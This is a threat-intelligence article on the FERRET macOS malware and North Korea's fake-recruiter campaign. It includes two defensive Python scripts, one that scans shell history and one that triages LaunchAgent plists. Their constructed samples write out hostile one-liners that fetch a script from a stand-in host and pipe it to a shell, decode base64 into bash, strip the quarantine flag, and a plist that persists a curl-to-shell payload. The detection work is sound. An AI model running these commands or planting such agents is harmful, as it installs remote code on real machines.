FERRET Malware
North Korean cyber operatives behind the Contagious Interview campaign have been found deploying macOS malware strains collectively dubbed FERRET under the guise of a job interview process. Unsuspecting targets are led to communicate with a supposed recruiter via a link that generates an error message, prompting them to install or update software like VCam or CameraAccess to proceed with the interview.
Contagious Interview: A Persistent Cyber Espionage Effort
First documented in late 2023, Contagious Interview is a sustained campaign that infects victims through malicious npm packages and native applications posing as videoconferencing software. The campaign, also tracked as DeceptiveDevelopment and DEV#POPPER, continues to evolve and employs increasingly sophisticated tactics.
Dropping BeaverTail and InvisibleFerret
The attack sequence typically results in the deployment of BeaverTail, a JavaScript-based malware designed to extract sensitive data from browsers and cryptocurrency wallets. This malware also acts as a delivery mechanism for an additional payload—a Python-based backdoor known as InvisibleFerret.
OtterCookie: Another Layer of Harmful Activity
In December 2024, cybersecurity researchers from Japan identified another component in the attack chain: a malware variant named OtterCookie. This JavaScript malware is configured to fetch and execute additional harmful payloads, further expanding the infection's capabilities.
Refining Evasion Tactics with ClickFix-Style Deception
When the FERRET malware family was identified towards the end of 2024, researchers noted that the attackers were refining their methods to better evade detection. One notable technique is a ClickFix-style lure: the victim is told that camera or microphone access is broken and is instructed to copy a command from the lure page and paste it into the macOS Terminal to "fix" it. The command itself carries out the infection, so no downloaded application needs to be opened.
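The ClickFix lure leaves its trace in the victim's shell history rather than in a downloaded file, so one practical check is to scan `~/.zsh_history` (or the equivalent) for one-liners that fetch or decode something and pipe it straight into a shell. The following is an added example, not code from the original page or from any vendor report; the indicator patterns are my own heuristics and the sample history lines are constructed for illustration, not the actual commands used by the campaign.

```python
"""Triage shell history for ClickFix-style one-liners (added example)."""
import re
from typing import List, Tuple

# (indicator name, weight, pattern). Weights are my own rough ranking:
# fetch-or-decode piped into a shell is the strongest single signal.
INDICATORS = [
    ("remote-fetch-piped-to-shell", 3,
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I)),
    ("base64-decoded-to-shell", 3,
     re.compile(r"base64\s+(-d|-D|--decode)[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I)),
    # Removing the quarantine attribute defeats the Gatekeeper prompt.
    ("quarantine-flag-removed", 2,
     re.compile(r"\bxattr\b.*\bcom\.apple\.quarantine\b|\bxattr\s+-[a-zA-Z]*c\b", re.I)),
    ("osascript-inline", 1, re.compile(r"\bosascript\s+-e\b", re.I)),
    ("exec-from-temp-dir", 1,
     re.compile(r"\b(chmod\s+\+x|sh|bash)\s+(/tmp|/private/tmp|/var/folders|\$TMPDIR)/", re.I)),
]


def classify_command(cmd: str) -> List[str]:
    """Return the names of every indicator that fires on one command line."""
    return [name for name, _, rx in INDICATORS if rx.search(cmd)]


def risk_score(cmd: str) -> int:
    """Sum of the weights of all indicators that fire on the command."""
    return sum(w for name, w, rx in INDICATORS if rx.search(cmd))


def scan_history(history_text: str, threshold: int = 3) -> List[Tuple[int, str, List[str]]]:
    """Scan zsh/bash history text and return (line_no, command, indicators)
    for every line whose score reaches the threshold.

    zsh extended-history lines look like ': 1738000000:0;<command>', so the
    timestamp prefix is stripped before matching; plain bash lines pass through.
    """
    hits = []
    for n, line in enumerate(history_text.splitlines(), 1):
        cmd = re.sub(r"^:\s*\d+:\d+;", "", line).strip()
        if cmd and risk_score(cmd) >= threshold:
            hits.append((n, cmd, classify_command(cmd)))
    return hits


# Constructed sample history: lines 2 and 4 are ClickFix-shaped, line 5 is a
# weaker quarantine-removal signal, the rest is ordinary developer activity.
SAMPLE_HISTORY = """\
: 1738000001:0;ls -la ~/Downloads
: 1738000002:0;curl -fsSL https://example.invalid/fix-camera.sh | sh
: 1738000003:0;echo aGVsbG8= | base64 -d
: 1738000004:0;echo Y3VybCAuLi4= | base64 -d | bash
: 1738000005:0;xattr -d com.apple.quarantine ~/Downloads/CameraAccess.app
: 1738000006:0;git pull
: 1738000007:0;chmod +x /tmp/.update && /tmp/.update
"""

if __name__ == "__main__":
    for line_no, cmd, inds in scan_history(SAMPLE_HISTORY):
        print(f"line {line_no}: {inds}\n    {cmd}")
```

With the default threshold of 3 only the two pipe-to-shell lines are reported; lowering it to 2 also surfaces the quarantine removal, which on its own is common enough in legitimate developer workflows that it is better treated as corroborating evidence than as an alert by itself.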
Targeting Job Seekers Through LinkedIn
The initial phase of these attacks often begins with LinkedIn outreach, where the threat actors pose as recruiters. Their goal is to persuade the target to complete a video assessment, which ultimately leads to the installation of a Golang-based backdoor. That backdoor is designed to drain cryptocurrency from MetaMask wallets and also lets the attackers execute commands on the compromised device.
Breaking Down the FERRET Malware Components
Researchers have identified several components associated with the FERRET malware family, each serving a distinct function in the attack sequence:
- FROSTYFERRET_UI: The initial-stage payload, often disguised as ChromeUpdate or CameraAccess applications.
- FRIENDLYFERRET_SECD: A second-stage Go backdoor that runs under the name 'com.apple.secd' (borrowed from Apple's own security daemon so it blends in), previously linked to the Hidden Risk campaign targeting cryptocurrency businesses.
- MULTI_FROSTYFERRET_CMDCODES: A Go configuration file supporting the second-stage backdoor's functionality.
FlexibleFerret: Establishing Persistence on macOS
A separate set of malware artifacts, referred to as FlexibleFerret, has also been discovered. This variant maintains persistence on an infected macOS system by installing a LaunchAgent, so that launchd restarts the payload at every login. The malware is delivered via an installer package named InstallerAlert and mirrors the functionality of FROSTYFERRET_UI.
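Because FlexibleFerret persists through a LaunchAgent, the per-user LaunchAgents directory is the place to look on a suspected host. The following is an added example, not code from the original page or from any vendor report: it parses LaunchAgent plists with the standard `plistlib` and flags the properties that distinguish a malicious agent from a vendor updater. The three plists are constructed for illustration (only the label 'com.apple.secd' is taken from the page; the paths, arguments and the 'example' labels are invented), and the heuristics are my own rather than any published detection rule.

```python
"""Triage macOS LaunchAgent plists for persistence indicators (added example)."""
import os
import plistlib
import posixpath
from typing import Dict, List

# Apple installs its own agents here; a 'com.apple.*' label anywhere else is suspect.
APPLE_AGENT_DIRS = ("/System/Library/LaunchAgents", "/System/Library/LaunchDaemons")
TEMP_LIKE = ("/tmp/", "/private/tmp/", "/private/var/tmp/", "/var/folders/", "/Users/Shared/")
TRUSTED_PREFIXES = ("/Applications/", "/usr/", "/System/", "/Library/", "/bin/", "/sbin/", "/opt/")
INLINE_INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3", "perl", "ruby"}


def executable_of(plist: Dict) -> str:
    """launchd runs Program if set, otherwise ProgramArguments[0]."""
    if plist.get("Program"):
        return str(plist["Program"])
    args = plist.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def triage_launch_agent(plist_bytes: bytes, source_dir: str) -> List[str]:
    """Return the list of indicators that fire for one plist found in source_dir."""
    plist = plistlib.loads(plist_bytes)
    label = str(plist.get("Label", ""))
    exe = executable_of(plist)
    args = [str(a) for a in plist.get("ProgramArguments") or []]
    findings = []
    if label.startswith("com.apple.") and source_dir not in APPLE_AGENT_DIRS:
        findings.append("apple-label-outside-system-dir")
    if exe.startswith(TEMP_LIKE):
        findings.append("executable-in-temp-dir")
    if any(seg.startswith(".") for seg in exe.split("/") if seg):
        findings.append("hidden-path-component")
    if plist.get("RunAtLoad") and plist.get("KeepAlive") and not exe.startswith(TRUSTED_PREFIXES):
        findings.append("persistent-user-home-binary")
    if posixpath.basename(exe) in INLINE_INTERPRETERS and any(a in ("-c", "-e") for a in args[1:]):
        findings.append("inline-script-argument")
    if any("curl" in a or "http://" in a or "https://" in a for a in args):
        findings.append("network-fetch-in-arguments")
    return findings


def triage_directory(directory: str) -> Dict[str, List[str]]:
    """Triage every .plist in a real LaunchAgents directory (not used by the tests)."""
    results = {}
    for name in sorted(os.listdir(directory)):
        if name.endswith(".plist"):
            with open(os.path.join(directory, name), "rb") as fh:
                results[name] = triage_launch_agent(fh.read(), directory)
    return results


# Constructed samples. SUSPICIOUS imitates an Apple daemon name and points at a
# hidden binary under the user's home; FETCHER stages its payload over the network;
# BENIGN is an ordinary vendor updater.
SUSPICIOUS = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.secd</string>
  <key>ProgramArguments</key><array>
    <string>/Users/victim/Library/Application Support/.secd</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

FETCHER = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.helper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -fsSL https://example.invalid/p | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Example.app/Contents/MacOS/updater</string><string>--check</string>
  </array>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>"""

if __name__ == "__main__":
    user_dir = os.path.expanduser("~/Library/LaunchAgents")
    for name, blob in (("suspicious", SUSPICIOUS), ("fetcher", FETCHER), ("benign", BENIGN)):
        print(name, triage_launch_agent(blob, user_dir))
```

On a live host, `triage_directory(os.path.expanduser("~/Library/LaunchAgents"))` runs the same checks over the real directory; an agent with no findings is not proven clean, but the combination of an Apple-style label, a hidden binary under the home directory and RunAtLoad plus KeepAlive is the shape a LaunchAgent-based backdoor takes and is worth pulling for analysis.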
Expanding Attack Vectors Beyond Job Seekers
While the FlexibleFerret samples were distributed as Apple Installer packages, the precise lure used to convince victims to run them remains unclear. Evidence does suggest that the malware is also being propagated by posting fake issues on legitimate GitHub repositories. This shift signals a broader targeting strategy that extends beyond job seekers to developers and other professionals within the tech industry.
As North Korean cyber actors continue refining their deceptive methods, security experts urge heightened vigilance when engaging with online job offers and software installation prompts.